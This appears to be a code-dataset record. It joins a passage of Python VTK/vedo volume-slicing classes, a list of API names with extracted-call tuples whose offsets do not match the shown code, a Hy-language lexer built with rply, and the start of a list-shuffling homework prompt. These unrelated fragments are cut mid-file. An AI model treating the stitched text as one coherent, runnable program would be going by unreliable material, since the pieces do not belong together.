self.axis = xyz_axis
if dimensions is not None and orientation < 0:
self.origin = np.zeros(3)
self.origin[xyz_axis] = dimensions[xyz_axis]
self.normal = normal
def flip_normal(self):
"""
Flip the normal of the slicer
"""
self.normal *= -1.0
self.check_normal()
if isinstance(self.axis, int):
self.axis *= -1
def check_normal(self):
"""
Check if the normal is axis-aligned.
If not, the axis is set to None.
"""
zeros = self.normal == 0
if len(self.normal[zeros]) >= 2:
self.axis = 0
def update(self, value=None, normal=None, axis=None):
"""
Update slicer
:param value: Origin of the slicing plane
:param normal: Normal of the slicing plane
:param axis: Axis, if the plane is axis-aligned
:return: True if model changed, False if it didn't
"""
if not(isinstance(value, int) or isinstance(value, float)):
if normal is None:
normal = self.normal
if normal is None:
return False
if normal[1] == 0 and normal[2] == 0:
axis = 0 #if normal[0] > 0 else 1
elif normal[0] == 0 and normal[2] == 0:
axis = 1 #if normal[1] > 0 else 1
elif normal[0] == 0 and normal[1] == 0:
axis = 2 #if normal[2] > 0 else 1
if axis is not None:
value = value[axis]
if axis is None:
axis = self.axis
if self.value == value:
return False
if axis is not None:
self.value = value
self.origin = np.array(normal) * value
else:
self.value = None
self.origin = value
self.normal = normal
self.axis = axis
return True
class SlicerView():
slices = {}
def __init__(self, plot, volume_view, slicer_model, standalone=True):
"""
Constructor
:param plot: Plot instance
:param volume_view: VolumeView instance
:param slicer_model: SlicerModel instance
:param standalone: Whether the slice is a standalone actor that
can be clicked. Set this to False if you want to use transparency,
at the expense that, because of a VTK bug, you won't be able to
click on it anymore, requiring you to implement another way of detecting
where the user clicked. See more in initialize_mapper()
"""
self.plot = plot
self.volume_view = volume_view
self.model = slicer_model
self.actor = None
self.filter = None
self.reslice = None
self.slice_type = -1
self.depth_peeling_enabled = None
self.standalone = standalone
self.got_slice = False
self.color_map = None
self.alpha_map = None
self.initialize()
def initialize(self, render=False):
"""
Initialize the slicer object
"""
if self.filter is None:
self.filter = vtk.vtkImageDataGeometryFilter()
if self.actor is None:
self.actor = vedo.Mesh(self.filter.GetOutput())
# Adding empty actor so that it's updated later on
self.plot.add(self.actor, render=render)
self.actor.lighting('off')
self.actor.name = self.model.name
self.initialize_mapper()
def initialize_mapper(self):
"""
Initialize the object mapper
"""
mapper = self.actor._mapper
mapper.SetScalarModeToUsePointData() #SetScalarModeToUsePointFieldData
mapper.SetColorModeToMapScalars()
mapper.ScalarVisibilityOn()
# We operate on static volumes thanks to the double LUT mapping implemented here
mapper.SetStatic(True)
# Without using scalar range, the mapping will be off
mapper.SetUseLookupTableScalarRange(True)
# We prevent this actor from being pickable as a result of the bug described below
# when we want to use transparency on the slice.
self.actor.pickable(self.standalone)
if self.standalone:
# There is a bug in VTK 9 that prevents clicking on transparent objects
# as reported on vedo's tracker https://github.com/marcomusy/vedo/issues/291
# The "Force opaque fix" below should be gone with the next VTK update hopefully.
# In the meantime, we use this.
# TODO: remove this when this bug is fixed in VTK
self.actor.ForceOpaqueOn()
else:
# We bypass the transparent selection bug when a VolumeView has multiple slicers
# like in box mode because the click detection occurs on the volume and we perform
# an additional test to see if a slicer yields a nearby result. If it does,
# the result is like clicking on the slice and we get transparency for free.
pass
# Make sure we have depth peeling activated, otherwise transparency with volumes
# will look weird and in the wrong order
self.plot.renderer.UseDepthPeelingOn()
self.plot.renderer.UseDepthPeelingForVolumesOn()
segmented = self.volume_view.model.is_segmented()
if segmented:
# This very line below will mess up the entire slice coloring if:
# - you have a segmented volume and this is set to True
# - you have a non-segmented (like raw MRI, CT) volume and this is set to False
mapper.SetInterpolateScalarsBeforeMapping(not segmented)
mapper.Update()
def set_color_map(self, color_map, alpha_map=None):
"""
Set a color map to the slice
:param color_map: Color map, can be a string, a list of colors or more.
See vedo documentation.
"""
self.color_map = color_map
if alpha_map is not None:
self.alpha_map = alpha_map
if self.got_slice and color_map is not None:
self.actor.cmap(self.color_map, alpha=self.alpha_map)
def set_slice_type(self, slice_type):
"""
Set the slice type. 0 for axial, 1 for free slicing
:param slice_type: Int value
"""
if slice_type == 0 and self.slice_type != slice_type:
self.slice_type = slice_type
self.filter.SetInputData(self.volume_view.actor.imagedata())
elif slice_type == 1 and self.slice_type != slice_type:
self.slice_type = slice_type
self.filter.SetInputData(self.reslice.GetOutput())
def slice_on_normal(self, origin, normal):
"""
Slice a volume with a plane oriented by the given normal.
This allows slicing in all directions.
:param origin: Origin of the slicing plane
:param normal: Normal of the slicing plane
:return: Mesh object with the slice as an image texture
"""
'''
mapper = vtk.vtkImageResliceMapper()
mapper.SetInputData(self.volume_view.actor._data)
mapper.SliceFacesCameraOff()
mapper.SliceAtFocalPointOff()
mapper.JumpToNearestSliceOn()
mapper.SetImageSampleFactor(2)
mapper.BorderOn()
mapper.BackgroundOff()
mapper.UpdateInformation()
mapper.GetSlicePlane().SetOrigin(*origin)
mapper.GetSlicePlane().SetNormal(*normal)
mapper.GetSlicePlane().Modified()
mapper.Modified()
mapper.Update()
self.actor = vtk.vtkImageSlice()
self.actor.SetMapper(mapper)
prop = vtk.vtkImageProperty()
if True:
prop.SetInterpolationTypeToLinear()
else:
prop.SetInterpolationTypeToNearest()
self.actor.SetProperty(prop)
return
'''
if self.reslice is None:
reslice = vtk.vtkImageReslice()
reslice.SetInputData(self.volume_view.actor._data)
#reslice.SetInputData(image)
reslice.SetOutputDimensionality(2)
reslice.SetAutoCropOutput(False)
#reslice.SetInterpolationModeToLinear()
reslice.SetInterpolationModeToNearestNeighbor()
reslice.SetSlabNumberOfSlices(1)
reslice.SetOutputSpacing(self.volume_view.get_spacing())
reslice.ReleaseDataFlagOn()
self.reslice = reslice
self.set_slice_type(1)
M, T = utils.get_transformation_matrix(origin, normal)
self.reslice.SetResliceAxes(M)
self.reslice.Update()
self.filter.Update()
if self.actor is None:
self.actor = vedo.Mesh(self.filter.GetOutput())
self.initialize_mapper()
else:
self.actor._update(self.filter.GetOutput())
self.initialize_mapper()
self.actor.SetOrientation(T.GetOrientation())
self.actor.SetPosition(origin)
self.got_slice = True
return self.actor
def x_slice(self, i):
"""
Extract the slice at index `i` of volume along x-axis.
:param i: I index
"""
self.set_slice_type(0)
nx, ny, nz = self.volume_view.actor.GetMapper().GetInput().GetDimensions()
if i <= 1 or i > nx - 1:
return False
self.filter.SetExtent(i, i, 0, ny, 0, nz)
self.filter.Update()
if self.actor is not None:
self.actor._update(self.filter.GetOutput())
else:
self.actor = vedo.Mesh(self.filter.GetOutput())
self.initialize_mapper()
self.got_slice = True
return True
def y_slice(self, j):
"""
Extract the slice at index `j` of volume along y-axis.
:param j: J index
"""
self.set_slice_type(0)
#nx, ny, nz = self.volume_view.model.dimensions / resolution
nx, ny, nz = self.volume_view.actor.GetMapper().GetInput().GetDimensions()
if j <= 1 or j > ny - 1:
return False
self.filter.SetExtent(0, nx, j, j, 0, nz)
self.filter.Update()
if self.actor is not None:
self.actor._update(self.filter.GetOutput())
else:
self.actor = vedo.Mesh(self.filter.GetOutput())
self.initialize_mapper()
self.got_slice = True
return True
def z_slice(self, k):
"""
Extract the slice at index `k` of volume along z-axis.
:param k: K index
"""
self.set_slice_type(0)
nx, ny, nz = self.volume_view.actor.GetMapper().GetInput().GetDimensions()
if k <= 1 or k > nz - 1:
return False
self.filter.SetExtent(0, nx, 0, ny, k, k)
self.filter.Update()
if self.actor is not None:
self.actor._update(self.filter.GetOutput())
else:
self.actor = vedo.Mesh(self.filter.GetOutput())
self.initialize_mapper()
self.got_slice = True
return True
def slice_on_axis(self, value=None, normal=None, axis=None, use_reslice=False):
"""
Slice on standard X, Y or Z axis
:param value: Value on the given axis
:param normal: Axis normal, can be either +1.0 or -1.0 along that axis
:param axis: Axis integer, 0 for X, 1 for Y, 2 for Z
:param use_reslice: if True, this enables vtkImageReslice which is useful when
the normal is not aligned to either X, Y or Z. If you use it on an axis-aligned
normal, some color inaccuracies will appear if you don't tweak the vtkImageResliceMapper.
This is why the default is False.
:return: Result boolean, whether the slice occurred or not
"""
resolution = self.volume_view.model.resolution
volume_dimensions = self.volume_view.model.dimensions
'''
if normal[axis] < 0:
if value > 0:
# Make value consistent with given normal.
value *= normal[axis]
value = volume_dimensions[axis] + value
'''
in_volume_slice = int(value) // resolution
if use_reslice:
self.slice_on_normal(normal * value, normal)
return
if axis == 0:
result = self.x_slice(in_volume_slice)
elif axis == 1:
result = self.y_slice(in_volume_slice)
elif axis == 2:
result = self.z_slice(in_volume_slice)
return result
def update(self):
"""
Update slice object according to data in the model
"""
had_slice = self.got_slice
result = True
if isinstance(self.model.axis, int) and 0 <= self.model.axis <= 2:
result = self.slice_on_axis(self.model.value, self.model.normal, self.model.axis)
else:
self.slice_on_normal(self.model.origin, self.model.normal)
if not result:
self.plot.remove(self.actor)
self.got_slice = False
return
#self.actor.pos(*(self.volume_view.actor.pos()-self.actor.pos()))
lut = self.volume_view.model.luts.current
if lut is not None:
'''
This is VTK for you...a mesh can use a vtkLookupTable for RGBA mapping
BUT volumes require vtkColorTransferFunction (RGB) and vtkPiecewiseFunction (alpha)
So we have to put a color map, alpha map and a vtkLookupTable
built from both maps in a LUTModel.
Alternatively, we could update the LUT with alpha values but it's a pain.
ctf = self.volume_view.actor.GetProperty().GetRGBTransferFunction()
lut = vedo.utils.ctf2lut(self.volume_view.actor)
otf = self.volume_view.actor.GetProperty().GetScalarOpacity
# using "ctf" would work only for colors, not for transparency!
self.apply_lut(ctf)
'''
self.apply_lut(lut.mapped_lut)
else:
if self.alpha_map is None:
self.actor.cmap(self.color_map)
else:
self.actor.cmap(self.color_map, alpha=self.alpha_map)
if self.model.clipping_planes is not None:
self.actor.mapper().SetClippingPlanes(self.model.clipping_planes)
if not had_slice:
self.plot.add(self.actor, render=True)
def apply_lut(self, lut=None):
"""
Apply a LUT to this slicer's actor
:param lut: vtkLookupTable to apply
"""
if self.actor is None or lut is None:
return
mapper = self.actor._mapper
mapper.SetLookupTable(lut) | [
"vedo.colors.getColor",
"numpy.random.rand",
"iblviewer.utils.get_transformation_matrix",
"nrrd.read",
"vtk.vtkPlane",
"iblviewer.objects.Points",
"vtk.vtkImageAppend",
"numpy.array",
"vedo.io.loadImageData",
"vtk.vtkImageReslice",
"vedo.colorMap",
"numpy.linalg.norm",
"vedo.loadImageData",
"logging.info",
"os.path.exists",
"vedo.download",
"iblviewer.utils.change_file_name",
"vtk.vtkDiscreteMarchingCubes",
"numpy.max",
"numpy.linspace",
"numpy.min",
"iblviewer.utils.time_diff",
"numpy.maximum",
"vtk.vtkPiecewiseFunction",
"vtk.vtkPlanes",
"dataclasses.field",
"glob.glob",
"collections.OrderedDict",
"vtk.vtkLookupTable",
"vtk.vtkVolumePicker",
"numpy.ones",
"vedo.colors.printc",
"vtk.vtkWindowedSincPolyDataFilter",
"vtk.vtkImageDataGeometryFilter",
"vtk.vtkGPUVolumeRayCastMapper",
"os.path.isfile",
"vtk.vtkImageMagnitude",
"vtk.vtkPlaneCollection",
"vtk.vtkImageData",
"vedo.utils.isSequence",
"vtk.vtkBMPReader",
"numpy.transpose",
"pandas.Series",
"nrrd.write",
"vtk.vtkVolume.__init__",
"numpy.ones_like",
"vtk.vtkFixedPointVolumeRayCastMapper",
"numpy.unique",
"numpy.minimum",
"vtk.vtkPolyDataConnectivityFilter",
"vedo.io.download",
"vtk.vtkThreshold",
"datetime.datetime.now",
"numpy.zeros",
"vedo.numpy2vtk",
"vedo.BaseGrid.__init__",
"vtk.vtkSmartVolumeMapper",
"vtk.vtkOpenGLGPUVolumeRayCastMapper",
"vedo.Mesh"
]
| [((753, 787), 'dataclasses.field', 'field', ([], {'default_factory': 'unique_name'}), '(default_factory=unique_name)\n', (758, 787), False, 'from dataclasses import dataclass, field\n'), ((841, 874), 'dataclasses.field', 'field', ([], {'default_factory': 'Collection'}), '(default_factory=Collection)\n', (846, 874), False, 'from dataclasses import dataclass, field\n'), ((892, 933), 'dataclasses.field', 'field', ([], {'default_factory': '(lambda : [1, 1, 1])'}), '(default_factory=lambda : [1, 1, 1])\n', (897, 933), False, 'from dataclasses import dataclass, field\n'), ((1442, 1475), 'dataclasses.field', 'field', ([], {'default_factory': 'Collection'}), '(default_factory=Collection)\n', (1447, 1475), False, 'from dataclasses import dataclass, field\n'), ((1502, 1535), 'dataclasses.field', 'field', ([], {'default_factory': 'Collection'}), '(default_factory=Collection)\n', (1507, 1535), False, 'from dataclasses import dataclass, field\n'), ((1566, 1599), 'dataclasses.field', 'field', ([], {'default_factory': 'Collection'}), '(default_factory=Collection)\n', (1571, 1599), False, 'from dataclasses import dataclass, field\n'), ((55813, 55847), 'dataclasses.field', 'field', ([], {'default_factory': 'unique_name'}), '(default_factory=unique_name)\n', (55818, 55847), False, 'from dataclasses import dataclass, field\n'), ((56028, 56053), 'numpy.array', 'np.array', (['[0.0, 0.0, 0.0]'], {}), '([0.0, 0.0, 0.0])\n', (56036, 56053), True, 'import numpy as np\n'), ((56079, 56104), 'numpy.array', 'np.array', (['[1.0, 0.0, 0.0]'], {}), '([1.0, 0.0, 0.0])\n', (56087, 56104), True, 'import numpy as np\n'), ((2599, 2616), 'numpy.min', 'np.min', (['self.data'], {}), '(self.data)\n', (2605, 2616), True, 'import numpy as np\n'), ((2641, 2658), 'numpy.max', 'np.max', (['self.data'], {}), '(self.data)\n', (2647, 2658), True, 'import numpy as np\n'), ((6526, 6556), 'numpy.transpose', 'np.transpose', (['self.data', 'shape'], {}), '(self.data, shape)\n', (6538, 6556), True, 'import numpy as np\n'), ((7033, 7107), 'logging.info', 'logging.info', (['"""\nBuilding appropriate volume from Allen data source..."""'], {}), '("""\nBuilding appropriate volume from Allen data source...""")\n', (7045, 7107), False, 'import logging\n'), ((10414, 10442), 'vtk.vtkVolume.__init__', 'vtk.vtkVolume.__init__', (['self'], {}), '(self)\n', (10436, 10442), False, 'import vtk\n'), ((10451, 10479), 'vedo.BaseGrid.__init__', 'vedo.BaseGrid.__init__', (['self'], {}), '(self)\n', (10473, 10479), False, 'import vedo\n'), ((19031, 19051), 'vtk.vtkLookupTable', 'vtk.vtkLookupTable', ([], {}), '()\n', (19049, 19051), False, 'import vtk\n'), ((19073, 19093), 'vtk.vtkLookupTable', 'vtk.vtkLookupTable', ([], {}), '()\n', (19091, 19093), False, 'import vtk\n'), ((24790, 24803), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (24801, 24803), False, 'from collections import OrderedDict\n'), ((33103, 33124), 'vtk.vtkVolumePicker', 'vtk.vtkVolumePicker', ([], {}), '()\n', (33122, 33124), False, 'import vtk\n'), ((35001, 35025), 'vtk.vtkPlaneCollection', 'vtk.vtkPlaneCollection', ([], {}), '()\n', (35023, 35025), False, 'import vtk\n'), ((35661, 35685), 'vtk.vtkPlaneCollection', 'vtk.vtkPlaneCollection', ([], {}), '()\n', (35683, 35685), False, 'import vtk\n'), ((38045, 38060), 'vtk.vtkPlanes', 'vtk.vtkPlanes', ([], {}), '()\n', (38058, 38060), False, 'import vtk\n'), ((38523, 38538), 'vtk.vtkPlanes', 'vtk.vtkPlanes', ([], {}), '()\n', (38536, 38538), False, 'import vtk\n'), ((46463, 46482), 'numpy.linalg.norm', 'np.linalg.norm', (['ray'], 
{}), '(ray)\n', (46477, 46482), True, 'import numpy as np\n'), ((48549, 48679), 'iblviewer.objects.Points', 'obj.Points', (['positions'], {'values': 'values', 'radius': 'radius', 'screen_space': 'screen_space', 'color_map': 'color_map', 'min_v': 'min_v', 'max_v': 'max_v'}), '(positions, values=values, radius=radius, screen_space=\n screen_space, color_map=color_map, min_v=min_v, max_v=max_v)\n', (48559, 48679), True, 'import iblviewer.objects as obj\n'), ((49805, 49821), 'numpy.array', 'np.array', (['origin'], {}), '(origin)\n', (49813, 49821), True, 'import numpy as np\n'), ((49844, 49865), 'numpy.array', 'np.array', (['destination'], {}), '(destination)\n', (49852, 49865), True, 'import numpy as np\n'), ((49885, 49921), 'numpy.linalg.norm', 'np.linalg.norm', (['(destination - origin)'], {}), '(destination - origin)\n', (49899, 49921), True, 'import numpy as np\n'), ((52223, 52243), 'vtk.vtkLookupTable', 'vtk.vtkLookupTable', ([], {}), '()\n', (52241, 52243), False, 'import vtk\n'), ((52589, 52619), 'vtk.vtkDiscreteMarchingCubes', 'vtk.vtkDiscreteMarchingCubes', ([], {}), '()\n', (52617, 52619), False, 'import vtk\n'), ((52834, 52869), 'vtk.vtkWindowedSincPolyDataFilter', 'vtk.vtkWindowedSincPolyDataFilter', ([], {}), '()\n', (52867, 52869), False, 'import vtk\n'), ((65918, 65965), 'iblviewer.utils.get_transformation_matrix', 'utils.get_transformation_matrix', (['origin', 'normal'], {}), '(origin, normal)\n', (65949, 65965), True, 'import iblviewer.utils as utils\n'), ((1768, 1779), 'numpy.zeros', 'np.zeros', (['(3)'], {}), '(3)\n', (1776, 1779), True, 'import numpy as np\n'), ((1819, 1830), 'numpy.zeros', 'np.zeros', (['(3)'], {}), '(3)\n', (1827, 1830), True, 'import numpy as np\n'), ((2001, 2026), 'numpy.array', 'np.array', (['self.data.shape'], {}), '(self.data.shape)\n', (2009, 2026), True, 'import numpy as np\n'), ((3901, 3940), 'vedo.download', 'vedo.download', (['file_path'], {'verbose': '(False)'}), '(file_path, verbose=False)\n', (3914, 3940), False, 'import vedo\n'), ((5186, 5200), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (5198, 5200), False, 'from datetime import datetime\n'), ((5229, 5305), 'iblviewer.utils.change_file_name', 'utils.change_file_name', (['file_path', 'None', 'None', 'VolumeModel.NORMALIZED_SUFFIX'], {}), '(file_path, None, None, VolumeModel.NORMALIZED_SUFFIX)\n', (5251, 5305), True, 'import iblviewer.utils as utils\n'), ((5321, 5350), 'os.path.exists', 'os.path.exists', (['new_file_path'], {}), '(new_file_path)\n', (5335, 5350), False, 'import os\n'), ((7175, 7190), 'numpy.unique', 'np.unique', (['data'], {}), '(data)\n', (7184, 7190), True, 'import numpy as np\n'), ((7275, 7292), 'pandas.Series', 'pd.Series', (['labels'], {}), '(labels)\n', (7284, 7292), True, 'import pandas as pd\n'), ((7976, 8030), 'logging.info', 'logging.info', (["('Saving volume data under ' + write_path)"], {}), "('Saving volume data under ' + write_path)\n", (7988, 8030), False, 'import logging\n'), ((8043, 8088), 'nrrd.write', 'nrrd.write', (['write_path', 'data'], {'index_order': '"""C"""'}), "(write_path, data, index_order='C')\n", (8053, 8088), False, 'import nrrd\n'), ((10953, 10984), 'vtk.vtkGPUVolumeRayCastMapper', 'vtk.vtkGPUVolumeRayCastMapper', ([], {}), '()\n', (10982, 10984), False, 'import vtk\n'), ((11665, 11683), 'vtk.vtkImageData', 'vtk.vtkImageData', ([], {}), '()\n', (11681, 11683), False, 'import vtk\n'), ((11698, 11729), 'vedo.utils.isSequence', 'vedo.utils.isSequence', (['inputobj'], {}), '(inputobj)\n', (11719, 11729), False, 'import vedo\n'), 
((21981, 22017), 'numpy.linspace', 'np.linspace', (['s_min', 's_max', 'num_steps'], {}), '(s_min, s_max, num_steps)\n', (21992, 22017), True, 'import numpy as np\n'), ((30005, 30024), 'numpy.array', 'np.array', (['([res] * 3)'], {}), '([res] * 3)\n', (30013, 30024), True, 'import numpy as np\n'), ((43270, 43296), 'vtk.vtkPiecewiseFunction', 'vtk.vtkPiecewiseFunction', ([], {}), '()\n', (43294, 43296), False, 'import vtk\n'), ((53427, 53462), 'vtk.vtkPolyDataConnectivityFilter', 'vtk.vtkPolyDataConnectivityFilter', ([], {}), '()\n', (53460, 53462), False, 'import vtk\n'), ((54730, 54745), 'vedo.Mesh', 'vedo.Mesh', (['poly'], {}), '(poly)\n', (54739, 54745), False, 'import vedo\n'), ((57437, 57448), 'numpy.zeros', 'np.zeros', (['(3)'], {}), '(3)\n', (57445, 57448), True, 'import numpy as np\n'), ((60515, 60547), 'vtk.vtkImageDataGeometryFilter', 'vtk.vtkImageDataGeometryFilter', ([], {}), '()\n', (60545, 60547), False, 'import vtk\n'), ((65344, 65365), 'vtk.vtkImageReslice', 'vtk.vtkImageReslice', ([], {}), '()\n', (65363, 65365), False, 'import vtk\n'), ((4015, 4051), 'nrrd.read', 'nrrd.read', (['downloaded_temp_file_path'], {}), '(downloaded_temp_file_path)\n', (4024, 4051), False, 'import nrrd\n'), ((4093, 4138), 'vedo.loadImageData', 'vedo.loadImageData', (['downloaded_temp_file_path'], {}), '(downloaded_temp_file_path)\n', (4111, 4138), False, 'import vedo\n'), ((4227, 4264), 'nrrd.read', 'nrrd.read', (['file_path'], {'index_order': '"""C"""'}), "(file_path, index_order='C')\n", (4236, 4264), False, 'import nrrd\n'), ((4306, 4335), 'vedo.loadImageData', 'vedo.loadImageData', (['file_path'], {}), '(file_path)\n', (4324, 4335), False, 'import vedo\n'), ((10690, 10723), 'vedo.io.download', 'download', (['inputobj'], {'verbose': '(False)'}), '(inputobj, verbose=False)\n', (10698, 10723), False, 'from vedo.io import loadImageData, download\n'), ((10749, 10773), 'os.path.isfile', 'os.path.isfile', (['inputobj'], {}), '(inputobj)\n', (10763, 10773), False, 'import os\n'), ((11049, 11086), 'vtk.vtkOpenGLGPUVolumeRayCastMapper', 'vtk.vtkOpenGLGPUVolumeRayCastMapper', ([], {}), '()\n', (11084, 11086), False, 'import vtk\n'), ((20122, 20159), 'vedo.colors.getColor', 'vedo.colors.getColor', (['color_map[r_id]'], {}), '(color_map[r_id])\n', (20142, 20159), False, 'import vedo\n'), ((20184, 20199), 'numpy.array', 'np.array', (['color'], {}), '(color)\n', (20192, 20199), True, 'import numpy as np\n'), ((31135, 31177), 'numpy.linalg.norm', 'np.linalg.norm', (['(center - self.model.center)'], {}), '(center - self.model.center)\n', (31149, 31177), True, 'import numpy as np\n'), ((35150, 35164), 'vtk.vtkPlane', 'vtk.vtkPlane', ([], {}), '()\n', (35162, 35164), False, 'import vtk\n'), ((39310, 39349), 'numpy.linalg.norm', 'np.linalg.norm', (['(current_origin - origin)'], {}), '(current_origin - origin)\n', (39324, 39349), True, 'import numpy as np\n'), ((47149, 47183), 'numpy.linalg.norm', 'np.linalg.norm', (['(position - hits[0])'], {}), '(position - hits[0])\n', (47163, 47183), True, 'import numpy as np\n'), ((53962, 53980), 'vtk.vtkThreshold', 'vtk.vtkThreshold', ([], {}), '()\n', (53978, 53980), False, 'import vtk\n'), ((57197, 57208), 'numpy.zeros', 'np.zeros', (['(3)'], {}), '(3)\n', (57205, 57208), True, 'import numpy as np\n'), ((59074, 59090), 'numpy.array', 'np.array', (['normal'], {}), '(normal)\n', (59082, 59090), True, 'import numpy as np\n'), ((2239, 2249), 'numpy.ones', 'np.ones', (['(3)'], {}), '(3)\n', (2246, 2249), True, 'import numpy as np\n'), ((11146, 11172), 
'vtk.vtkSmartVolumeMapper', 'vtk.vtkSmartVolumeMapper', ([], {}), '()\n', (11170, 11172), False, 'import vtk\n'), ((11828, 11848), 'vtk.vtkImageAppend', 'vtk.vtkImageAppend', ([], {}), '()\n', (11846, 11848), False, 'import vtk\n'), ((13049, 13067), 'vtk.vtkImageData', 'vtk.vtkImageData', ([], {}), '()\n', (13065, 13067), False, 'import vtk\n'), ((19617, 19642), 'numpy.random.rand', 'np.random.rand', (['num_steps'], {}), '(num_steps)\n', (19631, 19642), True, 'import numpy as np\n'), ((20314, 20336), 'numpy.maximum', 'np.maximum', (['color', '(0.0)'], {}), '(color, 0.0)\n', (20324, 20336), True, 'import numpy as np\n'), ((20365, 20387), 'numpy.minimum', 'np.minimum', (['color', '(1.0)'], {}), '(color, 1.0)\n', (20375, 20387), True, 'import numpy as np\n'), ((21378, 21423), 'vedo.colorMap', 'vedo.colorMap', (['value', 'color_map', 's_min', 's_max'], {}), '(value, color_map, s_min, s_max)\n', (21391, 21423), False, 'import vedo\n'), ((22206, 22263), 'vedo.colorMap', 'vedo.colorMap', (['mock_values[r_id]', 'color_map', 's_min', 's_max'], {}), '(mock_values[r_id], color_map, s_min, s_max)\n', (22219, 22263), False, 'import vedo\n'), ((39472, 39488), 'numpy.array', 'np.array', (['normal'], {}), '(normal)\n', (39480, 39488), True, 'import numpy as np\n'), ((40152, 40171), 'numpy.array', 'np.array', (['alpha_map'], {}), '(alpha_map)\n', (40160, 40171), True, 'import numpy as np\n'), ((40215, 40238), 'numpy.ones_like', 'np.ones_like', (['alpha_map'], {}), '(alpha_map)\n', (40227, 40238), True, 'import numpy as np\n'), ((40441, 40460), 'numpy.array', 'np.array', (['alpha_map'], {}), '(alpha_map)\n', (40449, 40460), True, 'import numpy as np\n'), ((10848, 10867), 'glob.glob', 'glob.glob', (['inputobj'], {}), '(inputobj)\n', (10857, 10867), False, 'import glob\n'), ((11232, 11270), 'vtk.vtkFixedPointVolumeRayCastMapper', 'vtk.vtkFixedPointVolumeRayCastMapper', ([], {}), '()\n', (11268, 11270), False, 'import vtk\n'), ((12048, 12066), 'vtk.vtkBMPReader', 'vtk.vtkBMPReader', ([], {}), '()\n', (12064, 12066), False, 'import vtk\n'), ((12167, 12190), 'vtk.vtkImageMagnitude', 'vtk.vtkImageMagnitude', ([], {}), '()\n', (12188, 12190), False, 'import vtk\n'), ((12540, 12558), 'numpy.array', 'np.array', (['inputobj'], {}), '(inputobj)\n', (12548, 12558), True, 'import numpy as np\n'), ((12630, 12670), 'vedo.numpy2vtk', 'vedo.numpy2vtk', (['inputobj'], {'dtype': 'np.float'}), '(inputobj, dtype=np.float)\n', (12644, 12670), False, 'import vedo\n'), ((13242, 13327), 'vedo.colors.printc', 'vedo.colors.printc', (['"""Error: must set dimensions (dims keyword) in Volume."""'], {'c': '"""r"""'}), "('Error: must set dimensions (dims keyword) in Volume.',\n c='r')\n", (13260, 13327), False, 'import vedo\n'), ((5623, 5644), 'iblviewer.utils.time_diff', 'utils.time_diff', (['time'], {}), '(time)\n', (5638, 5644), True, 'import iblviewer.utils as utils\n'), ((14629, 14652), 'vedo.io.loadImageData', 'loadImageData', (['inputobj'], {}), '(inputobj)\n', (14642, 14652), False, 'from vedo.io import loadImageData, download\n'), ((14680, 14765), 'vedo.colors.printc', 'vedo.colors.printc', (['"""Volume(): cannot understand input type:\n"""', 'inputtype'], {'c': '"""r"""'}), "('Volume(): cannot understand input type:\\n', inputtype,\n c='r')\n", (14698, 14765), False, 'import vedo\n'), ((14577, 14610), 'vedo.io.download', 'download', (['inputobj'], {'verbose': '(False)'}), '(inputobj, verbose=False)\n', (14585, 14610), False, 'from vedo.io import loadImageData, download\n')] |
# Copyright (c) 2013 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from rply import LexerGenerator
lg = LexerGenerator()
# A regexp for something that should end a quoting/unquoting operator
# i.e. a space or a closing brace/paren/curly
end_quote = r'(?![\s\)\]\}])'
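# For example (illustrative): in "'foo" the leading ' is lexed as QUOTE because the next
# character is not whitespace or a closer, while a ' immediately followed by ')' or a space
# does not match the QUOTE rule below.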
lg.add('LPAREN', r'\(')
lg.add('RPAREN', r'\)')
lg.add('LBRACKET', r'\[')
lg.add('RBRACKET', r'\]')
lg.add('LCURLY', r'\{')
lg.add('RCURLY', r'\}')
lg.add('HLCURLY', r'#\{')
lg.add('QUOTE', r'\'%s' % end_quote)
lg.add('QUASIQUOTE', r'`%s' % end_quote)
lg.add('UNQUOTESPLICE', r'~@%s' % end_quote)
lg.add('UNQUOTE', r'~%s' % end_quote)
lg.add('HASHBANG', r'#!.*[^\r\n]')
lg.add('HASHREADER', r'#[^{]')
# A regexp which matches incomplete strings, used to support
# multi-line strings in the interpreter
partial_string = r'''(?x)
(?:u|r|ur|ru)? # prefix
" # start string
(?:
| [^"\\] # non-quote or backslash
| \\(.|\n) # or escaped single character or newline
| \\x[0-9a-fA-F]{2} # or escaped raw character
| \\u[0-9a-fA-F]{4} # or unicode escape
| \\U[0-9a-fA-F]{8} # or long unicode escape
)* # one or more times
'''
lg.add('STRING', r'%s"' % partial_string)
lg.add('PARTIAL_STRING', partial_string)
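# Illustrative sketch of how the two rules above interact in the REPL:
#   '"abc"'  -> complete literal, matched by STRING
#   '"abc'   -> no closing quote yet, matched by PARTIAL_STRING so more input can be requested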
lg.add('IDENTIFIER', r'[^()\[\]{}\'"\s;]+')
lg.ignore(r';.*(?=\r|\n|$)')
lg.ignore(r'\s+')
lexer = lg.build()
| [
"rply.LexerGenerator"
]
| [((1136, 1152), 'rply.LexerGenerator', 'LexerGenerator', ([], {}), '()\n', (1150, 1152), False, 'from rply import LexerGenerator\n')] |
# Python provides a built-in method called random.shuffle that will shuffle the list data type. Do not use this.
# For this assignment, you are to create your own shuffle algorithm that will take as input a sorted list and randomly shuffle the items before returning the list. Try to make your algorithm as efficient as possible.
# Add a comment to your code stating what the time complexity of your algorithm is and why.
# Display list before and after shuffle. Call your shuffle function multiple times, each time on the original sorted list to show the random order of the list items.
data = [7, 20, 26, 31, 40, 51, 55, 63, 74, 81]
ndata = len(data)
import random
